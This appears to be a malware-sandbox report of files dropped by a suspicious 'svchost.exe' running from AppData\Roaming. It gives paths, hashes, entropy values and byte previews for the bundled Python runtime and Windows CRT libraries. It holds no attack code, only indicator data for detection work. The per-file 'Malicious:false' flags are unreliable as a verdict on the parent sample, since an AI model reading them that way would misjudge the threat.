                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................|..O........9...d...d.......|..O........d...............|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-math-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):28984
                          Entropy (8bit):6.6686462438397
                          Encrypted:false
                          SSDEEP:384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
                          MD5:8B0BA750E7B15300482CE6C961A932F0
                          SHA1:71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
                          SHA-256:BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
                          SHA-512:FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-process-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19256
                          Entropy (8bit):7.076072254895036
                          Encrypted:false
                          SSDEEP:192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
                          MD5:8D02DD4C29BD490E672D271700511371
                          SHA1:F3035A756E2E963764912C6B432E74615AE07011
                          SHA-256:C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
                          SHA-512:D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-runtime-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):22840
                          Entropy (8bit):6.942029615075195
                          Encrypted:false
                          SSDEEP:384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
                          MD5:41A348F9BEDC8681FB30FA78E45EDB24
                          SHA1:66E76C0574A549F293323DD6F863A8A5B54F3F9B
                          SHA-256:C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
                          SHA-512:8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-stdio-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):24368
                          Entropy (8bit):6.873960147000383
                          Encrypted:false
                          SSDEEP:384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
                          MD5:FEFB98394CB9EF4368DA798DEAB00E21
                          SHA1:316D86926B558C9F3F6133739C1A8477B9E60740
                          SHA-256:B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
                          SHA-512:57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-string-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):23488
                          Entropy (8bit):6.840671293766487
                          Encrypted:false
                          SSDEEP:384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
                          MD5:404604CD100A1E60DFDAF6ECF5BA14C0
                          SHA1:58469835AB4B916927B3CABF54AEE4F380FF6748
                          SHA-256:73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
                          SHA-512:DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-time-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20792
                          Entropy (8bit):7.018061005886957
                          Encrypted:false
                          SSDEEP:384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
                          MD5:849F2C3EBF1FCBA33D16153692D5810F
                          SHA1:1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
                          SHA-256:69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
                          SHA-512:44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-utility-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.127951145819804
                          Encrypted:false
                          SSDEEP:192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
                          MD5:B52A0CA52C9C207874639B62B6082242
                          SHA1:6FB845D6A82102FF74BD35F42A2844D8C450413B
                          SHA-256:A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
                          SHA-512:18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...|.......................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:Zip archive data, at least v2.0 to extract
                          Category:dropped
                          Size (bytes):788326
                          Entropy (8bit):5.450096772437984
                          Encrypted:false
                          SSDEEP:12288:hE7Qf7ul3vNuOn9/eV8h9+fsEaD1VykmrMbbcor:i7Qf7AvT/eV8h9+fsEaxdbbdr
                          MD5:8EB57166E2699F02C4BC8BE1383F283D
                          SHA1:1B89862749423F4A683B4DA2ADE4610CCD715E92
                          SHA-256:9F7818513C4A3D482539D83B0F5669D1C92D0E4DE707F028152EF2DC1F071F0E
                          SHA-512:259E001ED7417CFCAC6F8428422048CEB13ED2F814C27345EC55BF619E11F02D6464EFE30445AA6D3FD827582E8E1932DF4F59C9AAC6B0C6E77CB6102CC39607
                          Malicious:false
                          Reputation:unknown
                          Preview: PK..........!...^D............_bootlocale.pycU............e.....................@...sz...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nJz.e.j...W.n4..e.k.rj......e.e.d...r\d.d.d...Z.n.d.d.d...Z.Y.n.X.d.d.d...Z.d.S.).z.A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C...s....t.j.j.r.d.S.t.....d...S.).N..UTF-8.....)...sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r.....Lc:\users\ieuser\appdata\local\programs\python\python38-32\lib\_bootlocale.py..getpreferredencoding....s..........r......getandroidapilevelc....................C...s....d.S.).Nr....r....r....r....r....r....r........s......c....................C...s....t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r....).r....r....r......localer....).r....r....r....r....r....r........s............c....................C...s6...|.r.t...t.j.j
                          C:\Users\user\AppData\Local\Temp\_MEI63082\file.exe.manifest
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1490
                          Entropy (8bit):5.276963138578381
                          Encrypted:false
                          SSDEEP:24:2dt4+iNKg9mMPgi0iiNK+bkgxIme7cb3jgMkb4+GE:cSFKgYSEK+bkgxImeMcn3GE
                          MD5:0AA1B4EF7F524C59405E0F7B3F004920
                          SHA1:24B2A847CC79132566696803636E53CC9D87D79D
                          SHA-256:6F78C922ADC11D653C278685025181E37EE7976C5A57DF34EC297166A82F016D
                          SHA-512:26924E70A196FA455C68BE1DCFEEEC1F507A04BE79DE57A55523939C49F106A46194A379109B9348FF009CF5BBB7B676206FB14BBDFC82DFFD67EC2E77309214
                          Malicious:false
                          Reputation:unknown
                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity type="win32" name="file" processorArchitecture="x86" version="1.0.0.0"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">.. <security>.. <requestedPrivileges>.. <requestedExecutionLevel level="asInvoker" uiAccess="false"/>.. </requestedPrivileges>.. </security>.. </trustInfo>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" language="*" processorArchitecture="*" version="6.0.0.0" publicKeyToken="6595b64144ccf1df"/>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"/>.. </dependentAssembly>.. </dependency>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">.. <application>.. <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>.. <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440
                          C:\Users\user\AppData\Local\Temp\_MEI63082\libcrypto-1_1.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):2234560
                          Entropy (8bit):6.107082014192982
                          Encrypted:false
                          SSDEEP:49152:mIvPtO+ejtvRMO8xxZv1CPwDv3uFfJhFcl:xvPtwjnMO8HZv1CPwDv3uFfJh6
                          MD5:76DA35FDE4E3E110331612AB351A811C
                          SHA1:1836517441C70848DB3F5D4EF4EA0CB2E330732A
                          SHA-256:ECABC901FA89CD771405C004849384A5148644C273A88048AE16C86BD14EF4DD
                          SHA-512:A43DAE59C7D71E38F6365413946EE740C643299403DFE531D0CDBD561623807784830124B786422799AE45852F5AA541B5A94FA8E0947850547E2446BA99BC30
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ..dA..dA..dA..m9..pA..6)..fA..6)..nA..6)..nA..6)..nA..?)..oA..dA...A...(...C...(..eA...(m.eA...(..eA..RichdA..................PE..L......_...........!.................H........................................"......."...@.........................0~...h...U!.T.....!.|.............!.......!.X....b..8............................b..@............P!..............................text.............................. ..`.rdata..F&.......(..................@..@.data...4Y.... ....... .............@....idata..h....P!....... .............@..@.00cfg.......p!....... .............@..@.rsrc...|.....!.......!.............@..@.reloc........!.......!.............@..B........................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\libffi-7.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):29208
                          Entropy (8bit):6.643623418348
                          Encrypted:false
                          SSDEEP:384:l69PtXvz8cLBN3gHhY4AFlfIvDzqig2c2LuRRClfW23JLURlV5uH+6nYPLxDG4yG:l65tXvz2CTIvy2c26A35qYvWDG4yG
                          MD5:BC20614744EBF4C2B8ACD28D1FE54174
                          SHA1:665C0ACC404E13A69800FAE94EFD69A41BDDA901
                          SHA-256:0C7EC6DE19C246A23756B8550E6178AC2394B1093E96D0F43789124149486F57
                          SHA-512:0C473E7070C72D85AE098D208B8D128B50574ABEBBA874DDA2A7408AEA2AABC6C4B9018801416670AF91548C471B7DD5A709A7B17E3358B053C37433665D3F6B
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..qm.."m.."m.."d.p"o.."?..#o.."...#n.."m.."I.."?..#f.."?..#g.."?..#n.."...#k.."...#l.."...#l.."...#l.."Richm.."................PE..L.....]...........!.....@...........E.......P......................................H.....@.........................pU.......X..P....................X.......p..<....R..............................0R..@............P...............................text...j>.......@.................. ..`.rdata..p....P.......D..............@..@.data........`.......R..............@....reloc..<....p.......T..............@..B................................................................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\libssl-1_1.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):538304
                          Entropy (8bit):5.760022892820208
                          Encrypted:false
                          SSDEEP:12288:AqejFQiEYXBYYu3yzOBC4ISRpQuU2lvz/c:xaFJ5zF41TQuU2lvz/c
                          MD5:0E15ACB04CFABDE2A6493FAA49E74280
                          SHA1:E8EAC74A6DA0F1E78C66F84C14CF92DF18CC7E8A
                          SHA-256:A59EC84F8AE6F0174D5C1CE3ABC22B0FDCED6B50F7C8B689367AC859AC9E08E7
                          SHA-512:12D24D5FD42829FD0F89A1E42F46CD498D71E441EC803161319E721A3280406589B540EC949BBB6C0AF661CE806BA50A1097B7793C9A1CCC83061DEC4FC753AD
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............K...K...K..wK...K..J...K..J...K..J...K..J...K..J...K)..J...K...Km..K)..J...K)..J...K)..K...K)..J...KRich...K................PE..L......_...........!.........................................................`......h.....@..............................N..............s.................... ...5..P...8...............................@............................................text...7........................... ..`.rdata...g.......h..................@..@.data....;...p...6...Z..............@....idata..=A.......B..................@..@.00cfg..............................@..@.rsrc...s...........................@..@.reloc..4=... ...>..................@..B................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\pyexpat.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):168624
                          Entropy (8bit):6.629244601257658
                          Encrypted:false
                          SSDEEP:3072:ZhgFHiME7l8Z5bYwLoE8KZKGjUdGjN81IuBhh7Eu0:QFHc7l8ZORKZKGjtjN8E
                          MD5:6E2329BA53FF8B6E2E4069A859EE3FCE
                          SHA1:1C067F16A3069A44EDF7A073FA35B70B86F99405
                          SHA-256:27363A2DCDD990DEF43307B1644DC03304F9478830C8989C49F9DA2491889E6E
                          SHA-512:C0FCC4F0AE5C019ADAE3593F81BA26CA8C5CF6A7C15B78FD42B052DBDA6CBDEFDC6F8FA52C3FD614F1B17F48725D58CA23972C8B7C183EAFC0D542251A9EF23D
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C...-L..-L..-L..L..-Ls.,M..-Ls.(M..-Ls.)M..-Ls..M..-LT.,M..-L.,M..-L..,L..-LT.%M..-LT.-M..-LT..L..-LT./M..-LRich..-L........PE..L...../`...........!......................................................................@.........................`B..P....B.......p...............v...............=..T............................>..@............................................text............................... ..`.rdata...N.......P..................@..@.data...X....P.......>..............@....rsrc........p.......J..............@..@.reloc........... ...V..............@..B........................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\python38.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):4052656
                          Entropy (8bit):6.720992659261596
                          Encrypted:false
                          SSDEEP:49152:NgQmEhbJSgm06kaUr9Alta2tPfx1CI8jXHB7MZnCPYJAT37PtLKK4WoooOA:iEWg5uta2/8LHxMZBJ4lKKoooOA
                          MD5:7B97AB4F12ED448B26669B83F9061BEF
                          SHA1:0E2516F3DC50EFB7FAA0B276830B4F95D8084772
                          SHA-256:E7312737C82CC967FB669AE4C2736CB005F4192E1654C717DBDC5986E562957B
                          SHA-512:4F123981982EA4AFFE230CBDCDBEC9DE419D4F3D92C026B2DF3DA7D2BE9BEFAAB707167265CFC97FF183F13A60BE6C53FB541E00F518BEACE819B8B9B4927D8A
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........j...................%(................................"...y...".....".....".....Rich............PE..L...m./`...........!......#..........#.......#...............................?.......>...@..........................b8......%9.|.....=...............=...... =..e...]8.T...........................P^8.@.............#..............................text.....#.......#................. ..`.rdata.......#.......#.............@..@.data.......P9......89.............@....rsrc.........=......H;.............@..@.reloc...e... =..f...T;.............@..B........................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\pywintypes38.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):115712
                          Entropy (8bit):6.533866514211769
                          Encrypted:false
                          SSDEEP:3072:QCf+6EE1b22/q4+ldC56PsZyLY7b00nPO4KMGSncyl8ZpFI:h+xE1iz4+ldC5msYLY7b00PO4KMGScyW
                          MD5:3206CF4CD05B9E993A822C0DAC05B1D0
                          SHA1:F49E809FB19BC1E24F1A7904663375554BD4D5CD
                          SHA-256:9A3B70353BB9346BF1ECD2784164FEAF6DBC9CB969298091F549EF8269AEF930
                          SHA-512:A6A4AA66E264E2438DF573D31DA0827650F48F4877ECABF391D284C99019E041F3333A708E2657FFC565B0CB9933D9C7A77B3726B8F4EC0DDA5DA3C5E8AB68C0
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.>ua.P&a.P&a.P&h..&m.P&Z.Q'c.P&.c.&`.P&Z.S'c.P&Z.U's.P&Z.T'j.P&..V'`.P&u.Q'c.P&..Q'j.P&a.Q&..P&.U'l.P&.P'`.P&.R'`.P&Richa.P&........................PE..L....^._...........!..............................z.......................................@..........................K...E..............d............................A..T............................B..@............................................text...E........................... ..`.rdata..p...........................@..@.data...H...........................@....gfids..L...........................@..@.rsrc...d...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\select.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):24752
                          Entropy (8bit):6.44568082211825
                          Encrypted:false
                          SSDEEP:384:Tg7oA2vjUzNJmTgj0nq1RiPFdd+k1IumGEKDG4y8cLrhX:ccnvjANJiXnqSdWk1IumGEKDG4yLrhX
                          MD5:404C4F2FF59DA1993518D39754376606
                          SHA1:560A0F8A301EF5FEF541C6CE64975E3AA1AD1460
                          SHA-256:BB4FE62B14AD6FC559A1D88339D0F302450DAFEC09CF6027069F66B6D5BEF1AB
                          SHA-512:585ECF2B3DA37F1144191A70CA7C29151DE3C6BC1943719318BC291B29A08BB7E4A8C6200F8C743DF8BD32225221CADEB8306450B7E491B9B16AA94587711169
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2 ..SN..SN..SN..+...SN.S"O..SN.S"K..SN.S"J..SN.S"M..SN.t!O..SN..8O..SN..SO..SN.t!F..SN.t!N..SN.t!...SN.t!L..SN.Rich.SN.........................PE..L...../`...........!.........&...............0......................................j.....@......................... ;..L...l;..x....`...............D.......p.......6..T............................6..@............0...............................text...]........................... ..`.rdata.......0....... ..............@..@.data........P.......2..............@....rsrc........`.......4..............@..@.reloc.......p.......@..............@..B........................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\ucrtbase.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1142072
                          Entropy (8bit):6.809041027525523
                          Encrypted:false
                          SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                          MD5:D6326267AE77655F312D2287903DB4D3
                          SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                          SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                          SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\unicodedata.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1091248
                          Entropy (8bit):5.360848319038452
                          Encrypted:false
                          SSDEEP:12288:gJz3Q191SnFRHotduNpqQOZ6gBjCmN/X4GyCAx9++bBlhJk93cgewrxEekMGv:gJ3KSogG7hCc/4D9nbDhG2wr0MGv
                          MD5:5FB1A0234305D5B69DB79B4F7F89EBCA
                          SHA1:9A6EF3DD3A024B433566AC20146344A1F0631F9B
                          SHA-256:D9AF40281331CF55E21E20A57342FE86C6C729906D6A3AF3F3F3AD00F2284ABE
                          SHA-512:FE52C0AE494459B8D015E2E28AF92BDCF6A491DC424D803B3E87E21612C4654136335E5399F5CA0FEF4717EECE75D53AC11050623E109E4F7ED59392D74A9085
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........c..0..0..0..P0..0w..1..0w..1..0w..1..0w..1..0P..1..0...1..0..0...0P..1..0P..1..0P.<0..0P..1..0Rich..0........................PE..L...../`...........!.....F...B......rF.......`.......................................j....@.........................pv..X....v.......................................q..T...........................@r..@............`..4............................text....E.......F.................. ..`.rdata.......`... ...J..............@..@.data................j..............@....rsrc................v..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\win32api.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):104960
                          Entropy (8bit):6.460606710335285
                          Encrypted:false
                          SSDEEP:3072:KloBRQj7JH+VldRcmShLAG9wRcM7RSuQrbCQGt5Ne/eo:KloBa4ncmhWKUu/7t5Nen
                          MD5:2866BF1A085564A0F63B76173943BA64
                          SHA1:CAF810657651B1EC3F667A671E8F9307EEEA98B7
                          SHA-256:3021294B610E01ABD37289DDBE2BF0507E7DE3FCB678E07525EC4E0892747955
                          SHA-512:D1090831BA6D06C09F1DFE2790B435020854E328F9826937244C13CDDB1080CAB35F3679AB34EB44D88F9BECF4CCF933CD2EBE1B5CC853758BFA9BC04B002068
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@...!..!..!..Y..!.....!.....!.....!......!..G..!.....!...C..!..!... ......!......!......!..Rich.!..........................PE..L....^._...........!......................................................................@..........................L......dM..........T...........................`E..T............................D..@...............@...lL..@....................text...*........................... ..`.rdata.............................@..@.data................b..............@....gfids..L............t..............@..@.rsrc...T............v..............@..@.reloc........... ...z..............@..B................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\win32event.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):22016
                          Entropy (8bit):5.972372003642818
                          Encrypted:false
                          SSDEEP:384:AkUKkjmkLfkoke6am07BxEjr6p+zDLIkOn/T7AdlF7EpmkteAi5tjVUjaPGaCG:A3KwmwfzkAHUr6uQkG/T7AdlF7Epmktl
                          MD5:29EC0D47B88A465F69B5E18A3D35E1D0
